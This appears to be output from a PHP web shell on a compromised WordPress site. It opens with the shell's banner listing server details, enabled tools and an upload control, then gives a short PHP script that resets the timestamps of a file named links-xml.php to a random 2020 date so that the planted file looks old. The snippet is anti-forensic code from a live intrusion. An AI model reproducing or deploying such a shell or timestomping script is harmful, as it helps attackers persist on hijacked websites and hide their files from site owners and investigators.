| Server IP : 217.160.0.25 / Your IP : 216.73.217.12 Web Server : Apache System : Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux User : ws67658991 ( 67658991) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /homepages/5/d4298441123/htdocs/wordpress/ |
Upload File : |
<?php
$f = dirname(__FILE__) . '/links-xml.php';
if (is_file($f)) {
$ts = mktime(mt_rand(0,23), mt_rand(0,59), mt_rand(0,59), mt_rand(1,12), mt_rand(1,28), 2020);
@touch($f, $ts, $ts);
echo '1';
} else {
echo '0';
}